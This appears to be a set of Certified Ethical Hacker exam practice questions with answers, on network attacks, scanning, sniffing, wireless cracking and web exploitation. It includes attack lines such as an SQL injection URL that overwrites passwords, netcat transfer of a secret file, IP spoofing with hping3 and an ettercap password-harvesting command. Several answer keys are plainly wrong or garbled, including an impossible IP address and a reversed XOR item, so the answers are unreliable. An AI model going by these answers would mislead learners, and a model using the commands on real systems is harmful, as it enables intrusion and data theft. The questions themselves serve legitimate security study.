Stephanie works as senior security analyst for a manufacturing company in Detroit. Stephanie manages network security throughout the organization. Her colleague Jason told her in confidence that he was able to see confidential corporate information posted on the external website http://www.jeansclothesman.com. He tries random URLs on the company's website and finds confidential information leaked over the web. Jason says this happened about a month ago. Stephanie visits the said URLs, but she finds nothing. She is very concerned about this, since someone should be held accountable if there was sensitive information posted on the website. Where can Stephanie go to see past versions and pages of a website? a. AddressPast.com would have any web pages that are no longer hosted on the company's website b. Stephanie can go to Archive.org to see past versions of the company website c. If Stephanie navigates to Search.com; she will see old versions of the company website d. She should go to the web page Samspade.org to see web pages that might no longer be on the website

b. Stephanie can go to Archive.org to see past versions of the company website

Which of the following network attacks takes advantage of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack? a. SYN flood b. Teardrop c. Smurf attack d. Ping of death

b. Teardrop

Which one of the following network attacks takes advantages of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack? a. Ping of Death b. Teardrop c. Smurf d. SYN flood e. SNMP Attack

b. Teardrop

Destination unreachable administratively prohibited messages can inform the hacker to what? a. That the packets are being malformed by the scanning software b. That a router or other packet-filtering device is blocking traffic c. That the network is functioning normally d. That his/her scans are being blocked by a honeypot or jail e. That a circuit level proxy has been installed and is filtering traffic

b. That a router or other packet-filtering device is blocking traffic

Access control is often implemented through the use of MAC address filtering on wireless Access Points. Why is this considered to be a very limited security measure? a. The MAC address is not a real random number. b. The MAC address is broadcasted and can be captured by a sniffer. c. Vendors MAC address assignment is published on the Internet. d. The MAC address is used properly only on Macintosh computers.

b. The MAC address is broadcasted and can be captured by a sniffer.

There is a WEP encrypted wireless access point (AP) with no clients connected. In order to crack the WEP key, a fake authentication needs to be performed. What information is needed when performing fake authentication to an AP? (Choose two.) a. A failed authentication packet b. The SSID of the wireless network c. The IP address of the AP d. The MAC address of the AP

b. The SSID of the wireless network d. The MAC address of the AP

A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The company accepting bids wants proof of work so the consultant prints out several audits that have been performed. Which of the following is likely to occur as a result? a. The company accepting bids will hire the consultant because of the great work performed. b. The consultant may expose vulnerabilities of other companies. c. The company accepting bids will want the same type of format of testing. d. The consultant will ask for money on the bid because of great work.

b. The consultant may expose vulnerabilities of other companies.

Statistics from cert.org and other leading security organizations has clearly showed a steady rise in the number of hacking incidents perpetrated against companies. What do you think is the main reason behind the significant increase in hacking attempts over the past years? a. It is getting more challenging and harder to hack for non technical people. b. The ease with which hacker tools are available on the Internet. c. There is a phenomenal increase in processing power. d. New TCP/IP stack features are constantly being added.

b. The ease with which hacker tools are available on the Internet.

In this type of Man-in-the-Middle attack, packets and authentication tokens are captured using a sniffer. Once the relevant information is extracted, the tokens are placed back on the network to gain access. Picture: (Test 2 #32) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-121.gif a. Rainbow and Hash generation attack b. Token Injection Replay attacks c. Dumpster diving attack d. Shoulder surfing attack

b. Token Injection Replay attacks

_________ is one of the programs used to wardial. a. Netstumbler b. ToneLoc c. TooPac d. DialIT e. Kismet

b. ToneLoc

Lori is a Certified Ethical Hacker as well as a Certified Hacking Forensics Investigator working as an IT security consultant. Lori has been hired on by Kiley Innovators, a large marketing firm that recently underwent a string of thefts and corporate espionage incidents. Lori is told that a rival marketing company came out with an exact duplicate product right before Kiley Innovators was about to release it. The executive team believes that an employee is leaking information to the rival company. Lori questions all employees, reviews server logs, and firewall logs; after which she finds nothing. Lori is then given permission to search through the corporate email system. She searches by email being sent to and sent from the rival marketing company. She finds one employee that appears to be sending very large email to this other marketing company, even though they should have no reason to be communicating with them. Lori tracks down the actual emails sent and upon opening them, only finds picture files attached to them. These files seem perfectly harmless, usually containing some kind of joke. Lori decides to use some special software to further examine the pictures and finds that each one had hidden text that was stored in each picture. What technique was used by the Kiley Innovators employee to send information to the rival marketing company? a. The method used by the employee to hide the information was logical watermarking b. The employee used steganography to hide information in the picture attachments c. The Kiley Innovators employee used cryptography to hide the information in the emails sent d. By using the pictures to hide information,the employee utilized picture fuzzing

b. The employee used steganography to hide information in the picture attachments

What is the essential difference between an 'Ethical Hacker' and a 'Cracker'? a. The ethical hacker does it strictly for financial motives unlike a cracker. b. The ethical hacker has authorization from the owner of the target. c. The ethical hacker is just a cracker who is getting paid. d. The ethical hacker does not use the same techniques or skills as a cracker.

b. The ethical hacker has authorization from the owner of the target.

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the 192.168.1.0/24. Which of the following has occurred? a. The computer is not using a private IP address. b. The gateway is not routing to a public IP address. c. The gateway and the computer are not on the same network. d. The computer is using an invalid IP address.

b. The gateway is not routing to a public IP address.

Doug is conducting a port scan of a target network. He knows that his client target network has a web server and that there is a mail server also which is up and running. Doug has been sweeping the network but has not been able to elicit any response from the remote target. Which of the following could be the most likely cause behind this lack of response? Select 4. a. The destination network might be down b. The host might be down c. ICMP is filtered by a gateway d. UDP is filtered by a gateway e. The TCP windows size does not match f. The packet TTL value is too low and cannot reach the target

b. The host might be down c. ICMP is filtered by a gateway d. UDP is filtered by a gateway f. The packet TTL value is too low and cannot reach the target

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log? a. The traffic from 192.168.12.25 is from a Linux computer. b. The initial traffic from 192.168.12.35 was being spoofed. c. The TTL of 21 means that the client computer is on wireless. d. The client computer at 192.168.12.35 is a zombie computer.

b. The initial traffic from 192.168.12.35 was being spoofed.

How does an operating system protect the passwords used for account logins? a. The operating system stores the passwords in a secret file that users cannot find. b. The operating system performs a one-way hash of the passwords. c. The operating system stores all passwords in a protected segment of non-volatile memory. d. The operating system encrypts the passwords,and decrypts them when needed.

b. The operating system performs a one-way hash of the passwords.

Exhibit Picture: (Test 6 #26) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-537.gif Joe Hacker runs the hping2 hacking tool to predict the target host's sequence numbers in one of the hacking session. What does the first and second column mean? Select two. a. The first column reports the difference between current and last sequence number b. The second column reports the difference between the current and last sequence number c. The first column reports the sequence number d. The second column reports the next sequence number

b. The second column reports the difference between the current and last sequence number c. The first column reports the sequence number

Dan is conducting penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session? a. Dan can establish an interactive session only if he uses a NAT b. The server will send replies back to the spoofed IP address c. The scenario is incorrect as Dan can spoof his IP and get responses d. Dan cannot spoof his IP address over TCP network

b. The server will send replies back to the spoofed IP address

During the intelligence gathering phase of a penetration test, you come across a press release by a security products vendor stating that they have signed a multi-million dollar agreement with the company you are targeting. The contract was for vulnerability assessment tools and network based IDS systems. While researching on that particular brand of IDS you notice that its default installation allows it to perform sniffing and attack analysis on one NIC and caters to its management and reporting on another NI~ The sniffing interface is completely unbound from the TCP/IP stack by default. Assuming the defaults were used, how can you detect these sniffing interfaces? a. Send your attack traffic and look for it to be dropped by the IDS. b. The sniffing interface cannot be detected. c. Use a ping flood against the IP of the sniffing NIC and look for latency in the responses. d. Set your IP to that of the IDS and look for it as it attempts to knock your computer off the network.

b. The sniffing interface cannot be detected.

The following excerpt is taken from a honeyput log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. Study the log given below and answer the following question: (Note: The objective of this questions is to test whether the student has learnt about passive OS fingerprinting (which should tell them the OS from log captures): can they tell a SQL injection attack signature; can they infer if a user ID has been created by an attacker and whether they canread plain source - destination entries from log entries.) Picture: (Test 6 #30) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-539.gif What can you infer from the above log? a. The system is a web application server compromised through SQL injection. b. The system is a windows system which is being scanned unsuccessfully. c. The system has been compromised and backdoored by the attacker. d. The actual IP of the successful attacker is 24.9.255.53.

b. The system is a windows system which is being scanned unsuccessfully.

What is the main difference between a "Normal" SQL Injection and a "Blind" SQL Injection vulnerability? a. The successful attack does not show an error message to the administrator of the affected application. b. The vulnerable application does not display errors with information about the injection results to the attacker. c. The attack is called "Blind" because,although the application properly filters user input,it is still vulnerable to code injection. d. The request to the web server is not visible to the administrator of the vulnerable application.

b. The vulnerable application does not display errors with information about the injection results to the attacker

If an attacker's computer sends an IPID of 24333 to a zombie (Idle Scanning) computer on a closed port, what will be the response? a. The zombie computer will respond with an IPID of 24333. b. The zombie computer will respond with an IPID of 24334. c. The zombie computer will respond with an IPID of 24335. d. The zombie computer will not send a response.

b. The zombie computer will respond with an IPID of 24334.

Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm? Select the best answer. a. Internal AD Integrated DNS servers are using private DNS names that are b. There are two external DNS Servers for Internet domains. Both are AD integrated. c. unregistered. d. All external DNS is done by an ISP. e. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server.

b. There are two external DNS Servers for Internet domains. Both are AD integrated.

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this? a. Block TCP at the firewall b. There is no way to completely block tracerouting into this area c. Block UDP at the firewall d. Block ICMP at the firewall

b. There is no way to completely block tracerouting into this area

What makes web application vulnerabilities so aggravating? (Choose two) a. They exist only on the Linux platform. b. They can be launched through an authorized port. c. A firewall will not stop them. d. They are detectable by most leading antivirus software.

b. They can be launched through an authorized port. c. A firewall will not stop them.

Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function? a. Similar RAM requirements b. They must be dual-homed c. Fast network interface cards d. Fast processor to help with network traffic analysis

b. They must be dual-homed

Exhibit: ettercap -NCLzs --quiet What does the command in the exhibit do in "Ettercap"? a. This command will provide you the entire list of hosts in the LAN b. This command will detach from console and log all the collected passwords from the network to a file. c. This command will check if someone is poisoning you and will report its IP. d. This command broadcasts ping to scan the LAN instead of ARP request of all the subnet IPs.

b. This command will detach from console and log all the collected passwords from the network to a file.

What happens when one experiences a ping of death? a. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the source equal to destination address. b. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP),the Last Fragment bit is set,and (IP offset ' 8) + (IP data length) >65535. In other words,the IP offset (which represents the starting position of this fragment in the original packet,and which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet. c. This is when an the IP header is set to 1 (ICMP) and the "type" field in the ICMP header is set to 5 (Redirect). d. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the "type" field in the ICMP header is set to 18 (Address Mask Reply).

b. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP),the Last Fragment bit is set,and (IP offset ' 8) + (IP data length) >65535. In other words,the IP offset (which represents the starting position of this fragment in the original packet,and which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet.

Jeremy is web security consultant for Information Securitas. Jeremy has just been hired to perform contract work for a large state agency in Michigan. Jeremy's first task is to scan all the company's external websites. Jeremy comes upon a login page which appears to allow employees access to sensitive areas on the website. James types in the following statement in the username field: SELECT * from Users where username='admin' ?AND password='' AND email like '%@testers.com%' What will the SQL statement accomplish? a. If the page is susceptible to SQL injection,it will look in the Users table for usernames of admin b. This statement will look for users with the name of admin, blank passwords, and email addresses that end in @testers.com c. This Select SQL statement will log James in if there are any users with NULL passwords d. James will be able to see if there are any default user accounts in the SQL database

b. This statement will look for users with the name of admin, blank passwords, and email addresses that end in @testers.com

Which of the following problems can be solved by using Wireshark? a. Checking creation dates on all webpages on a server b. Troubleshooting communication resets between two systems c. Tracking version changes of source code d. Resetting the administrator password on multiple systems

b. Troubleshooting communication resets between two systems

If you receive a RST packet while doing an ACK scan, it indicates that the port is open.(True/False). a. False b. True

b. True

Which set of access control solutions implements two-factor authentication? a. Password and PIN b. USB token and PIN c. Fingerprint scanner and retina scanner d. Account and password

b. USB token and PIN

Which of the following tools are used for enumeration? (Choose three.) a. Cheops b. USER2SID c. SolarWinds d. SID2USER e. DumpSec

b. USER2SID d. SID2USER e. DumpSec

Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generate traffic on the network so that he can capture enough packets to crack the WEP key? a. Derek can use KisMAC as it needs two USB devices to generate traffic b. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic c. Derek can use a session replay on the packets captured d. Use any ARP requests found in the capture

b. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic

John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine. Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose? a. Use Monkey shell b. Use HTTPTunnel or Stunnel on port 80 and 443 c. Use reverse shell using FTP protocol d. Use ClosedVPN

b. Use HTTPTunnel or Stunnel on port 80 and 443

An attacker runs netcat tool to transfer a secret file between two hosts. Machine A: netcat -l -p 1234 < secretfile Machine B: netcat 192.168.3.4 > 1234 He is worried about information being sniffed on the network. How would the attacker use netcat to ncrypt the information before transmitting onto the wire? a. Machine A: netcat -l -e magickey -p 1234 < testfile Machine B: netcat 1234 b. Use cryptcat instead of netcat c. Machine A: netcat -l -p 1234 < testfile -pw password Machine B: netcat 1234 -pw password d. Machine A: netcat -l -p -s password 1234 < testfile Machine B: netcat 1234

b. Use cryptcat instead of netcat

Bob, an Administrator at XYZ was furious when he discovered that his buddy Trent, has launched a session hijack attack against his network, and sniffed on his communication, including administrative tasks suck as configuring routers, firewalls, IDS, via Telnet. Bob, being an unhappy administrator, seeks your help to assist him in ensuring that attackers such as Trent will not be able to launch a session hijack in XYZ. Based on the above scenario, please choose which would be your corrective measurement actions. (Choose two) a. Implement FAT32 filesystem for faster indexing and improved performance. b. Use encrypted protocols,like those found in the OpenSSH suite. c. Monitor for CRP caches,by using IDS products. d. Configure the appropriate spoof rules on gateways (internal and external).

b. Use encrypted protocols,like those found in the OpenSSH suite. d. Configure the appropriate spoof rules on gateways (internal and external).

How do you defend against Privilege Escalation? Choose at least one answer. a. Allow security settings of IE to zero or Low b. Use encryption to protect sensitive data c. Run users and applications on the least privileges d. Restrict the interactive logon privileges e. Run services as unprivileged accounts

b. Use encryption to protect sensitive data c. Run users and applications on the least privileges d. Restrict the interactive logon privileges e. Run services as unprivileged accounts

You work as security technician at XYZ.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation? a. Use mget to download all pages locally for further inspection. b. Use wget to download all pages locally for further inspection. c. Use get() to download all pages locally for further inspection. d. Use get* to download all pages locally for further inspection.

b. Use wget to download all pages locally for further inspection.

How would you prevent session hijacking attacks? a. Using non-Internet protocols like http secures sessions against hijacking b. Using unpredictable sequence numbers secures sessions against hijacking c. Using hardware-based authentication secures sessions against hijacking d. Using biometrics access tokens secures sessions against hijacking

b. Using unpredictable sequence numbers secures sessions against hijacking

While performing data validation of web content, a security technician is required to restrict malicious input. Which of the following processes is an efficient way of restricting malicious input? a. Validate web content input with scanning tools. b. Validate web content input for type,length,and range. c. Validate web content input for extraneous queries. d. Validate web content input for query strings.

b. Validate web content input for type,length,and range.

You want to perform advanced SQL Injection attack against a vulnerable website. You are unable to perform command shell hacks on this server. What must be enabled in SQL Server to launch these attacks? a. System services b. xp_cmdshell c. RDC d. EXEC master access

b. xp_cmdshell

Fake Anti-Virus, is one of the most frequently encountered and persistent threats on the web. This malware uses social engineering to lure users into infected websites with a technique called Search Engine Optimization. Once the Fake AV is downloaded into the user's computer, the software will scare them into believing their system is infected with threats that do not really exist, and then push users to purchase services to clean up the non-existent threats. The Fake AntiVirus will continue to send these annoying and intrusive alerts until a payment is made. Picture: (Test 1 #74) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-071.gif What is the risk of installing Fake AntiVirus? a. Once infected,the computer will be unable to boot and the Trojan will attempt to format the hard disk b. Victim's personally identifiable information such as billing address and credit card details,may be extracted and exploited by the attacker c. Denial of Service attack will be launched against the infected computer crashing other machines on the connected network d. Victim's Operating System versions,services running and applications installed will be published on Blogs and Forums

b. Victim's personally identifiable information such as billing address and credit card details,may be extracted and exploited by the attacker

You receive an e-mail with the following text message. "Microsoft and HP today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allows hackers to access your computer. Delete the file immediately. Please also pass this message to all your friends and colleagues as soon as possible." You launch your antivirus software and scan the suspicious looking file hidserv.exe located in c:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file "Human Interface Device Service". What category of virus is this? a. Stealth Virus b. Virus hoax c. Spooky Virus d. Polymorphic Virus

b. Virus hoax

WEP is used on 802.11 networks, what was it designed for? a. WEP is designed to provide a wireless local area network (WLAN) with a level of availability and privacy comparable to what is usually expected of a wired LAN. b. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN. c. WEOP is designed to provide a wireless local area network (WLAN) with a level of privacy comparable to what it usually expected of a wired LAN. d. WEP is designed to provide strong encryption to a wireless local area network (WLAN) with a lever of integrity and privacy adequate for sensible but unclassified information.

b. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN.

What is War Dialing? a. War dialing is a vulnerability scanning technique that penetrates Firewalls b. War dialing involves the use of a program in conjunction with a modem to penetrate the modem/PBX-based systems c. Involves IDS Scanning Fragments to bypass Internet filters and stateful Firewalls d. It is a social engineering technique that uses Phone calls to trick victims

b. War dialing involves the use of a program in conjunction with a modem to penetrate the modem/PBX-based systems

What type of port scan is shown below? Picture: (Test 3 #22) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-226.gif a. SYN Stealth Scan b. XMAS Scan c. Windows Scan d. Idle Scan

b. XMAS Scan

When discussing passwords, what is considered a brute force attack? a. You load a dictionary of words into your cracking program b. You attempt every single possibility until you exhaust all possible combinations or discover the password c. You threaten to use the rubber hose on someone unless they reveal their password d. You create hashes of a large number of words and compare it with the encrypted passwords e. You wait until the password expires

b. You attempt every single possibility until you exhaust all possible combinations or discover the password

Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error? Select the best answer. a. There is no way to get the changed webpage unless you contact someone at the company b. archive.org c. Javascript would not be in their html so a service like usenet or archive wouldn't help you d. Usenet

b. archive.org

You want to hide a secret.txt document inside c:\windows\system32\tcpip.dll kernel library using ADS streams. How will you accomplish this? a. copy secret.txt c:\windows\system32\tcpip.dll |secret.txt b. copy secret.txt c:\windows\system32\tcpip.dll:secret.txt c. copy secret.txt c:\windows\system32\tcpip.dll kernel>secret.txt d. copy secret.txt >< c:\windows\system32\tcpip.dll kernel secret.txt

b. copy secret.txt c:\windows\system32\tcpip.dll:secret.txt

A security policy will be more accepted by employees if it is consistent and has the support of a. a supervisor. b. executive management. c. coworkers. d. the security officer.

b. executive management.

The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources. However, host A can continue to receive data as long as the SYN sequence numbers of transmitted packets from host B are lower than the packet segment containing the set FIN flag. a. false b. true

b. true

A company is legally liable for the content of email that is sent from its systems, regardless of whether the message was sent for private or business-related purposes. This could lead to prosecution for the sender and for the company's directors if, for example, outgoing email was found to contain material that was pornographic, racist, or likely to incite someone to commit an act of terrorism. You can always defend yourself by "ignorance of the law" clause. a. true b. false

b. false

A digital signature is simply a message that is encrypted with the public key instead of the private key. a. true b. false

b. false

International Organization for Standardization (ISO) standard 27002 provides guidance for compliance by outlining a. contract agreement writing standards. b. guidelines and practices for security controls. c. standard best practice for configuration management. d. financial soundness and business viability metrics.

b. guidelines and practices for security controls.

Perimeter testing means determining exactly what your firewall blocks and what it allows. To conduct a good test, you can spoof source IP addresses and source ports. Which of the following command results in packets that will appear to originate from the system at 10.8.8.8? Such a packet is useful for determining whether the firewall is allowing random packets in or out of your network. a. hping3 -Y 10.8.8.8 -S windows -c 2 -p 80 b. hping3 -a 10.8.8.8 -S springfield -c 2 -p 80 c. hping3 -O 10.8.8.8 -S server -c 2 -p 80 d. hping3 -T 10.8.8.8 -S netbios -c 2 -p 80

b. hping3 -a 10.8.8.8 -S springfield -c 2 -p 80

Identify SQL injection attack from the HTTP requests shown below: a. http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22 b. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00 c. http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js %22%3e%3c%2fscript%3e d. http://www.victim.com/example accountnumber=67891&creditamount=999999999

b. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00

Leesa is the senior security analyst for a publicly traded company. The IT department recently rolled out an intranet for company use only with information ranging from training, to holiday schedules, to human resources data. Leesa wants to make sure the site is not accessible from outside and she also wants to ensure the site is Sarbanes-Oxley (SOX) compliant. Leesa goes to a public library as she wants to do some Google searching to verify whether the company's intranet is accessible from outside and has been indexed by Google. Leesa wants to search for a website title of "intranet" with part of the URL containing the word "intranet" and the words "human resources" somewhere in the webpage. What Google search will accomplish this? a. related:intranet allinurl:intranet:"human resources" b. intitle:intranet inurl:intranet+intext:"human resources" c. cache:"human resources" inurl:intranet(SharePoint) d. site:"human resources"+intext:intranet intitle:intranet

b. intitle:intranet inurl:intranet+intext:"human resources"

Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1? a. ip.addr == 192.168.0.1 and syn = 1 b. ip.addr ==192.168.0.1 and tcp.flags.syn c. ip.equals 192.168.0.1 and syn.equals on d. ip == 192.168.0.1 and tcp.syn

b. ip.addr ==192.168.0.1 and tcp.flags.syn

John is using a special tool on his Linux platform that has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI/ASPX scripts. Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of this tool? a. nmap b. nessus c. make d. hping2

b. nessus

John is using a special tool on his Linux platform that has a signature database and is therefore able to detect hundred of vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts. Additionally, the database detects DDoS zombies and Trojans. What would be the name of this multifunctional tool? a. hping b. nessus c. make d. nmap

b. nessus

Study the log below and identify the scan type. Picture: (Test 6 #96) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-587.gif a. nmap -sV 192.168.1.10 b. nmap -sO -T 192.168.1.10 c. nmap -sS 192.168.1.10 d. nmap -sR 192.168.1.10

b. nmap -sO -T 192.168.1.10

What is the correct PCAP filter to capture all TCP traffic going to or from host 192.168.0.125 on port 25? a. tcp.src == 25 and ip.host == 192.168.0.125 b. tcp.port == 25 and ip.host == 192.168.0.125 c. host 192.168.0.125:25 d. port 25 and host 192.168.0.125

b. tcp.port == 25 and ip.host == 192.168.0.125

SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False) a. false b. true

b. true

What are the two basic types of attacks? (Choose two. a. Sniffing b. Cracking c. Active d. Passive e. DoS

c. Active d. Passive

LAN Manager Passwords are concatenated to 14 bytes, and split in half. The two halves are hashed individually. If the password is 7 characters or less, than the second half of the hash is always: a.0xAAD3B435B51404BB b.0xAAD3B435B51404EE c.0xAAD3B435B51404CC d.0xAAD3B435B51404AA

b.0xAAD3B435B51404EE

Which of the following Registry location does a Trojan add entries to make it persistent on Windows 7? (Select 2 answers) Picture: (Test 3 #3) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-220.gif a.HKEY_CURRENT_USER\Software\Microsoft\Windows\System32\CurrentVersion\Run b.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run d.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\System32\CurrentVersion\ Run

b.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

A hacker is attempting to see which IP addresses are currently active on a network. Which NMAP switch would the hacker use? a. -sO b. -sS c. -sP d. -sU

c. -sP

Which of the following Exclusive OR transforms bits is NOT correct? a. 0 xor 1 = 1 b. 1 xor 1 = 1 c. 1 xor 0 = 1 d. 0 xor 0 = 0

c. 1 xor 0 = 1

A hacker was able to sniff packets on a company's wireless network. The following information was discovered. The Key 10110010 01001011 The Cyphertext 01100101 01011010 Using the Exclusive OR, what was the original message? a. 00101000 11101110 b. 11110010 01011011 c. 11010111 00010001 d. 00001101 10100100

c. 11010111 00010001

WPA2 uses AES for wireless data encryption at which of the following encryption levels? a. 64 bit and CCMP b. 128 bit and CRC c. 128 bit and CCMP d. 128 bit and TKIP

c. 128 bit and CCMP

Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network? a. 137 and 139 b. 139 and 443 c. 139 and 445 d. 137 and 443

c. 139 and 445

Steve scans the network for SNMP enabled devices. Which port number Steve should scan? a. 69 b. 169 c. 161 d. 150

c. 161

The following is an email header. What address is that of the true originator of the message? Picture: (Test 7 #90) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-683.gif\ a. 51.32.123.21 b. 19.25.19.10 c. 168.150.84.123 d. 8.10.2/8.10.2 e. 215.52.220.122

c. 168.150.84.123

While examining a log report you find out that an intrusion has been attempted by a machine whose IP address is displayed as 0xde.0xad.0xbe.0xef. It looks to you like a hexadecimal number. You perform a ping 0xde.0xad.0xbe.0xef. Which of the following IP addresses will respond to the ping and hence will likely be responsible for the intrusion? a. 203.20.4.5 b. 192.10.25.9 c. 222.273.290.239 d. 10.0.3.4

c. 222.273.290.239

One of the better features of NetWare is the use of packet signature that includes cryptographic signatures. The packet signature mechanism has four levels from 0 to 3. In the list below which of the choices represent the level that forces NetWare to sign all packets? a. 2 b. 0 (zero) c. 3 d. 1

c. 3

Which is the Novell Netware Packet signature level used to sign all packets ? a. 2 b. 1 c. 3 d. 0

c. 3

Which of the following is a symmetric cryptographic standard? a. PKI b. DSA c. 3DES d. RSA

c. 3DES

When working with Windows systems, what is the RID of the true administrator account? a. 1024 b. 1001 c. 500 d. 512 e. 1000 f. 501

c. 500

How is sniffing broadly categorized? a. Filtered and unfiltered b. Broadcast and unicast c. Active and passive d. Unmanaged and managed

c. Active and passive

Carl has successfully compromised a web server from behind a firewall by exploiting a vulnerability in the web server program. He wants to proceed by installing a backdoor program. However, he is aware that not all inbound ports on the firewall are in the open state. From the list given below, identify the port that is most likely to be open and allowed to reach the server that Carl has just compromised. a. 110 b. 69 c. 53 d. 25

c. 53

You establish a new Web browser connection to Google. Since a 3-way handshake is required for any TCP connection, the following actions will take place. Picture: (Test 2 #30) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-131.gif DNS query is sent to the DNS server to resolve www.google.com DNS server replies with the IP address for Google? SYN packet is sent to Google. Google sends back a SYN/ACK packet Your computer completes the handshake by sending an ACK The connection is established and the transfer of data commences Which of the following packets represent completion of the 3-way handshake? a. 3rdpacket b. 6thpacket c. 5thpacket d. 4thpacket

c. 5thpacket

What port number is used by Kerberos protocol? a. 419 b. 487 c. 88 d. 44

c. 88

A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate? a. A buffer overflow attack has already occurred b. The system has crashed c. A buffer overflow attack has been attempted d. An intrusion detection system has been triggered e. A firewall has been breached and this is logged

c. A buffer overflow attack has been attempted

In Trojan terminology, what is a covert channel? Picture: (Test 2 #61) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-180.gif a. It is Reverse tunneling technique that uses HTTPS protocol instead of HTTP protocol to establish connections b. A legitimate communication path within a computer system or network for transfer of data c. A channel that transfers information within a computer system or network in a way that violates the security policy d. It is a kernel operation that hides boot processes and services to mask detection

c. A channel that transfers information within a computer system or network in a way that violates the security policy

How does a denial-of-service attack work? a. A hacker tries to decipher a password by using a system,which subsequently crashes the network b. A hacker attempts to imitate a legitimate user by confusing a computer or even another person c. A hacker prevents a legitimate user (or group of users) from accessing a service d. A hacker uses every character,word,or letter he or she can think of to defeat authentication

c. A hacker prevents a legitimate user (or group of users) from accessing a service

SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections. The signature of attack for SYN Flood contains: a. The source and destination address having the same value b. The source and destination port numbers having the same value c. A large number of SYN packets appearing on a network without the corresponding reply packets d. A large number of SYN packets appearing on a network with the corresponding reply packets

c. A large number of SYN packets appearing on a network without the corresponding reply packets

While performing a ping sweep of a local subnet you receive an ICMP reply of Code 3/Type 13 for all the pings you have sent out. What is the most likely cause of this? a. The firewall is dropping the packets b. An in-line IDS is dropping the packets c. A router is blocking ICMP d. The host does not respond to ICMP packets

c. A router is blocking ICMP

Tess King is using the nslookup command to craft queries to list all DNS information (such as Name Servers, host names, MX records, CNAME records, glue records (delegation for child Domains), zone serial number, TimeToLive (TTL) records, etc) for a Domain. What do you think Tess King is trying to accomplish? Select the best answer. a. A zone estimate b. A zone harvesting c. A zone transfer d. A zone update

